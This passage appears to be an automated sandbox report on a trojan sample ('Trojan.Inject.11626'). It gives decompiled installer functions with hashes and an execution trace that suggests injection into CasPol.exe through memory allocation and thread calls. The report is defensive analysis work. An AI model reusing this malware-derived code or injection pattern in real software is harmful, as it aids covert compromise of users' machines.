				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsg40B0.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                    0x0040263e
                                                                                    0x0040263e
                                                                                    0x0040263e
                                                                                    0x00402643
                                                                                    0x00402646
                                                                                    0x00402649
                                                                                    0x0040264e
                                                                                    0x00402650
                                                                                    0x00402670
                                                                                    0x004026aa
                                                                                    0x00402672
                                                                                    0x00402674
                                                                                    0x00402688
                                                                                    0x00402695
                                                                                    0x00402695
                                                                                    0x00402652
                                                                                    0x00402654
                                                                                    0x00402659
                                                                                    0x00402667
                                                                                    0x0040266a
                                                                                    0x004026af
                                                                                    0x004026b2
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x004026b8
                                                                                    0x004026c1
                                                                                    0x004026c3
                                                                                    0x004026e2
                                                                                    0x004015b4
                                                                                    0x004015b6
                                                                                    0x00000000
                                                                                    0x004015bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004026c3
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll), ref: 00402695
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsg40B0.tmp$C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll
                                                                                    • API String ID: 1659193697-3369712530
                                                                                    • Opcode ID: 62470bb53eb1f3cb993cbab3509981ff1ddd93c56dff0317477feba142f44d38
                                                                                    • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                    • Opcode Fuzzy Hash: 62470bb53eb1f3cb993cbab3509981ff1ddd93c56dff0317477feba142f44d38
                                                                                    • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403C25() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2e0
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2f0
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				return E00405D74(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsg40B0.tmp", 7);
			}






                                                                                    0x00403c25
                                                                                    0x00403c34
                                                                                    0x00403c37
                                                                                    0x00403c39
                                                                                    0x00403c39
                                                                                    0x00403c40
                                                                                    0x00403c48
                                                                                    0x00403c4b
                                                                                    0x00403c4d
                                                                                    0x00403c4d
                                                                                    0x00403c4d
                                                                                    0x00403c54
                                                                                    0x00403c66

                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(000002E0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                    • CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                    • C:\Users\user\AppData\Local\Temp\nsg40B0.tmp, xrefs: 00403C5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsg40B0.tmp
                                                                                    • API String ID: 2962429428-857638918
                                                                                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 89%
                                                                                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                    0x00405642
                                                                                    0x0040564c
                                                                                    0x00405668
                                                                                    0x0040568a
                                                                                    0x0040568d
                                                                                    0x00405693
                                                                                    0x0040569d
                                                                                    0x0040569e
                                                                                    0x004056a0
                                                                                    0x004056a6
                                                                                    0x004056a6
                                                                                    0x004056b0
                                                                                    0x00000000
                                                                                    0x004056be
                                                                                    0x00405675
                                                                                    0x004056ad
                                                                                    0x004056ad
                                                                                    0x00000000
                                                                                    0x004056ad
                                                                                    0x00405681
                                                                                    0x00405683
                                                                                    0x00000000
                                                                                    0x00405683
                                                                                    0x00405652
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405659
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                    0x00405f84
                                                                                    0x00405f8e
                                                                                    0x00405f91
                                                                                    0x00405f97
                                                                                    0x00405f98
                                                                                    0x00405f99
                                                                                    0x00405fa1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fa1
                                                                                    0x00405fa3
                                                                                    0x00405fab

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,80000000,00000003), ref: 00405F89
                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe,80000000,00000003), ref: 00405F99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-3370423016
                                                                                    • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                    • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                    • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                    • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                    0x004060cd
                                                                                    0x004060cf
                                                                                    0x004060d2
                                                                                    0x004060fe
                                                                                    0x004060d7
                                                                                    0x004060e0
                                                                                    0x004060e5
                                                                                    0x004060f0
                                                                                    0x004060f3
                                                                                    0x0040610f
                                                                                    0x004060f5
                                                                                    0x004060fc
                                                                                    0x00000000
                                                                                    0x004060fc
                                                                                    0x00406108
                                                                                    0x0040610c
                                                                                    0x0040610c
                                                                                    0x00406106
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:21.7%
                                                                                    Dynamic/Decrypted Code Coverage:98.7%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:224
                                                                                    Total number of Limit Nodes:19
                                                                                    execution_graph 78578 1080ee8 78579 1080ef4 78578->78579 78580 1080f21 78578->78580 78579->78580 78583 1081078 78579->78583 78587 1081080 78579->78587 78584 10810c5 FindWindowW 78583->78584 78586 1081105 78584->78586 78586->78580 78588 10810c5 FindWindowW 78587->78588 78590 1081105 78588->78590 78590->78580 78591 1d5b1ab8 78592 1d5b1ae7 78591->78592 78595 1d5b0824 78592->78595 78594 1d5b1c0c 78596 1d5b082f 78595->78596 78597 1d5b212a 78596->78597 78600 1d5b48a0 78596->78600 78615 1d5b4893 78596->78615 78597->78594 78601 1d5b48cb 78600->78601 78602 1d5b37b8 GetModuleHandleW 78601->78602 78603 1d5b4932 78602->78603 78611 1d5b37b8 GetModuleHandleW 78603->78611 78630 1d5b4e50 78603->78630 78635 1d5b4e80 78603->78635 78640 1d5b4dd0 78603->78640 78604 1d5b494e 78605 1d5b37c8 GetModuleHandleW 78604->78605 78607 1d5b497a 78604->78607 78606 1d5b49be 78605->78606 78646 1d5b6781 78606->78646 78655 1d5b67a8 78606->78655 78658 1d5b6798 78606->78658 78611->78604 78616 1d5b48cb 78615->78616 78617 1d5b37b8 GetModuleHandleW 78616->78617 78618 1d5b4932 78617->78618 78626 1d5b37b8 GetModuleHandleW 78618->78626 78627 1d5b4dd0 GetModuleHandleW 78618->78627 78628 1d5b4e50 GetModuleHandleW 78618->78628 78629 1d5b4e80 GetModuleHandleW 78618->78629 78619 1d5b494e 78620 1d5b37c8 GetModuleHandleW 78619->78620 78622 1d5b497a 78619->78622 78621 1d5b49be 78620->78621 78623 1d5b6798 CreateWindowExW 78621->78623 78624 1d5b67a8 CreateWindowExW 78621->78624 78625 1d5b6781 2 API calls 78621->78625 78623->78622 78624->78622 78625->78622 78626->78619 78627->78619 78628->78619 78629->78619 78631 1d5b4ead 78630->78631 78632 1d5b4f2e 78631->78632 78633 1d5b4ff0 GetModuleHandleW 78631->78633 78634 1d5b4fe0 GetModuleHandleW 78631->78634 78633->78632 78634->78632 78636 1d5b4ead 78635->78636 78637 1d5b4f2e 78636->78637 78638 1d5b4ff0 GetModuleHandleW 78636->78638 78639 1d5b4fe0 GetModuleHandleW 78636->78639 78638->78637 78639->78637 78641 1d5b4deb 78640->78641 78642 1d5b4def 78640->78642 78641->78604 78643 1d5b4e40 78642->78643 78644 1d5b4ff0 GetModuleHandleW 78642->78644 78645 1d5b4fe0 GetModuleHandleW 78642->78645 78643->78604 78644->78643 78645->78643 78647 1d5b67ad 78646->78647 78648 1d5b6790 78646->78648 78649 1d5b67b1 78647->78649 78650 1d5b67e5 CreateWindowExW 78647->78650 78648->78607 78651 1d5b67dd 78649->78651 78662 1d5b4674 78649->78662 78654 1d5b691c 78650->78654 78651->78607 78656 1d5b4674 CreateWindowExW 78655->78656 78657 1d5b67dd 78656->78657 78657->78607 78659 1d5b67a8 78658->78659 78660 1d5b4674 CreateWindowExW 78659->78660 78661 1d5b67dd 78660->78661 78661->78607 78663 1d5b467b CreateWindowExW 78662->78663 78665 1d5b691c 78663->78665 78405 110c3c8 NtAllocateVirtualMemory 78406 1087ad0 78407 1087af8 78406->78407 78410 1087b24 78406->78410 78408 1087b01 78407->78408 78411 1086fcc 78407->78411 78413 1086fd7 78411->78413 78412 1087e1b 78412->78410 78413->78412 78415 1086fe8 78413->78415 78416 1087e50 OleInitialize 78415->78416 78417 1087eb4 78416->78417 78417->78412 78418 1d46d01c 78419 1d46d034 78418->78419 78420 1d46d08e 78419->78420 78428 1d5bb15b 78419->78428 78440 1d5b69b0 78419->78440 78446 1d5b69a0 78419->78446 78452 1d5bb143 78419->78452 78463 1d5b6ad0 78419->78463 78474 1d5b468c 78419->78474 78478 1d5b469c 78419->78478 78429 1d5bb0e6 78428->78429 78430 1d5bb162 78428->78430 78429->78420 78431 1d5bb1c9 78430->78431 78433 1d5bb1b9 78430->78433 78513 1d5ba144 78431->78513 78489 1084468 78433->78489 78494 1d5bb2f0 78433->78494 78498 1084544 78433->78498 78504 1084478 78433->78504 78509 1d5bb2e3 78433->78509 78434 1d5bb1c7 78441 1d5b69d6 78440->78441 78442 1d5b468c GetModuleHandleW 78441->78442 78443 1d5b69e2 78442->78443 78444 1d5b469c 2 API calls 78443->78444 78445 1d5b69f7 78444->78445 78445->78420 78447 1d5b69b0 78446->78447 78448 1d5b468c GetModuleHandleW 78447->78448 78449 1d5b69e2 78448->78449 78450 1d5b469c 2 API calls 78449->78450 78451 1d5b69f7 78450->78451 78451->78420 78454 1d5bb150 78452->78454 78453 1d5bb1c9 78455 1d5ba144 2 API calls 78453->78455 78454->78420 78454->78453 78456 1d5bb1b9 78454->78456 78457 1d5bb1c7 78455->78457 78458 1084468 2 API calls 78456->78458 78459 1084478 2 API calls 78456->78459 78460 1d5bb2e3 2 API calls 78456->78460 78461 1d5bb2f0 2 API calls 78456->78461 78462 1084544 2 API calls 78456->78462 78458->78457 78459->78457 78460->78457 78461->78457 78462->78457 78464 1d5b6ade 78463->78464 78470 1d5b6a92 78463->78470 78465 1d5b6afd 78464->78465 78466 1d5b6ae0 78464->78466 78543 1d5b37b8 78465->78543 78537 1d5b46c4 78466->78537 78468 1d5b6ae7 78468->78420 78470->78420 78471 1d5b6b49 78473 1d5b6bb7 78471->78473 78548 1d5b37c8 78471->78548 78475 1d5b4697 78474->78475 78476 1d5b46c4 GetModuleHandleW 78475->78476 78477 1d5b6ae7 78476->78477 78477->78420 78481 1d5b46a7 78478->78481 78479 1d5bb1c9 78480 1d5ba144 2 API calls 78479->78480 78483 1d5bb1c7 78480->78483 78481->78479 78482 1d5bb1b9 78481->78482 78484 1084468 2 API calls 78482->78484 78485 1084478 2 API calls 78482->78485 78486 1d5bb2e3 2 API calls 78482->78486 78487 1d5bb2f0 2 API calls 78482->78487 78488 1084544 2 API calls 78482->78488 78484->78483 78485->78483 78486->78483 78487->78483 78488->78483 78491 108448c 78489->78491 78490 1084518 78490->78434 78520 1084521 78491->78520 78523 1084530 78491->78523 78496 1d5bb2fe 78494->78496 78495 1d5ba144 2 API calls 78495->78496 78496->78495 78497 1d5bb3ef 78496->78497 78497->78434 78499 1084502 78498->78499 78500 1084552 78498->78500 78502 1084530 2 API calls 78499->78502 78503 1084521 2 API calls 78499->78503 78501 1084518 78501->78434 78502->78501 78503->78501 78505 108448c 78504->78505 78507 1084530 2 API calls 78505->78507 78508 1084521 2 API calls 78505->78508 78506 1084518 78506->78434 78507->78506 78508->78506 78511 1d5bb2f0 78509->78511 78510 1d5ba144 2 API calls 78510->78511 78511->78510 78512 1d5bb3ef 78511->78512 78512->78434 78514 1d5ba14f 78513->78514 78515 1d5bb50c 78514->78515 78516 1d5bb462 78514->78516 78517 1d5bb469 78515->78517 78518 1d5b469c CallWindowProcW 78515->78518 78516->78517 78519 1d5bb4ba CallWindowProcW 78516->78519 78517->78434 78518->78517 78519->78517 78522 1084541 78520->78522 78526 1085962 78520->78526 78522->78490 78524 1084541 78523->78524 78525 1085962 2 API calls 78523->78525 78524->78490 78525->78524 78529 1d5ba144 2 API calls 78526->78529 78530 1d5bb410 78526->78530 78527 108597a 78527->78522 78529->78527 78531 1d5bb415 78530->78531 78532 1d5bb50c 78531->78532 78533 1d5bb462 78531->78533 78534 1d5b469c CallWindowProcW 78532->78534 78536 1d5bb469 78532->78536 78535 1d5bb4ba CallWindowProcW 78533->78535 78533->78536 78534->78536 78535->78536 78536->78527 78538 1d5b46cf 78537->78538 78539 1d5b37b8 GetModuleHandleW 78538->78539 78540 1d5b6b49 78539->78540 78541 1d5b37c8 GetModuleHandleW 78540->78541 78542 1d5b6bb7 78540->78542 78541->78542 78544 1d5b37c3 78543->78544 78545 1d5b4deb 78544->78545 78552 1d5b4fe0 78544->78552 78562 1d5b4ff0 78544->78562 78545->78471 78549 1d5b5350 GetModuleHandleW 78548->78549 78551 1d5b53c5 78549->78551 78551->78473 78553 1d5b4ff0 78552->78553 78554 1d5b37c8 GetModuleHandleW 78553->78554 78556 1d5b504a 78553->78556 78554->78556 78555 1d5b5216 78555->78545 78556->78555 78557 1d5b37c8 GetModuleHandleW 78556->78557 78558 1d5b519b 78557->78558 78558->78555 78559 1d5b37c8 GetModuleHandleW 78558->78559 78560 1d5b51e9 78559->78560 78560->78555 78561 1d5b37c8 GetModuleHandleW 78560->78561 78561->78555 78563 1d5b5005 78562->78563 78564 1d5b37c8 GetModuleHandleW 78563->78564 78566 1d5b504a 78563->78566 78564->78566 78565 1d5b5216 78565->78545 78566->78565 78567 1d5b37c8 GetModuleHandleW 78566->78567 78568 1d5b519b 78567->78568 78568->78565 78569 1d5b37c8 GetModuleHandleW 78568->78569 78570 1d5b51e9 78569->78570 78570->78565 78571 1d5b37c8 GetModuleHandleW 78570->78571 78571->78565 78400 1d5ba610 78401 1d5ba59a 78400->78401 78402 1d5ba5a7 DuplicateHandle 78401->78402 78404 1d5ba61b 78401->78404 78403 1d5ba5e6 78402->78403 78572 110e3cc TerminateThread 78573 110e3e0 78572->78573 78574 156ae08 78575 156ae27 LdrInitializeThunk 78574->78575 78577 156ae5b 78575->78577

                                                                                    Executed Functions

                                                                                    Function 0110C3C8 Relevance: 1.5, APIs: 1, Instructions: 8memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL ref: 0110C3D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19734044248.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1100000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: 8f1d01dfea00bf45ed861f509e5f01f14413dec5db8133741f19fe8878e80591
                                                                                    • Instruction ID: 1ef04f8e98fd647faaca76b215e15d1797547269c6cad3871ebdc2eb02e34f50
                                                                                    • Opcode Fuzzy Hash: 8f1d01dfea00bf45ed861f509e5f01f14413dec5db8133741f19fe8878e80591
                                                                                    • Instruction Fuzzy Hash: DAB09293A562B5068B23F3224E7420EA69048468717644F6810368F2D2EA0AE41B47E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01425260 Relevance: .1, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19735902032.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1420000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1a478e9e5351908297fb3178cdcb3b2359dff3bbaae544d1eae266123c62a94a
                                                                                    • Instruction ID: 681854cf375c54a52f7bc6c1dc6515f743b291fc4ae17ac6cd71709ee249915a
                                                                                    • Opcode Fuzzy Hash: 1a478e9e5351908297fb3178cdcb3b2359dff3bbaae544d1eae266123c62a94a
                                                                                    • Instruction Fuzzy Hash: 5E219130A042198FCB04CF68D544AEEBBF2EF88314F64816AE104DB355E731E886CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01006EA8 Relevance: 2.5, APIs: 1, Instructions: 963libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
